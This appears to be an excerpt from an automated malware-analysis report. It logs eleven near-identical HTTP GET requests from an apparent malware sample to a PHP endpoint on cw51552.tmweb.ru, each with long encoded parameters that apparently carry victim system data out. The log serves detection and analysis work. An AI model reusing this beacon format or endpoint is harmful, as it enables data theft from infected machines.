Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
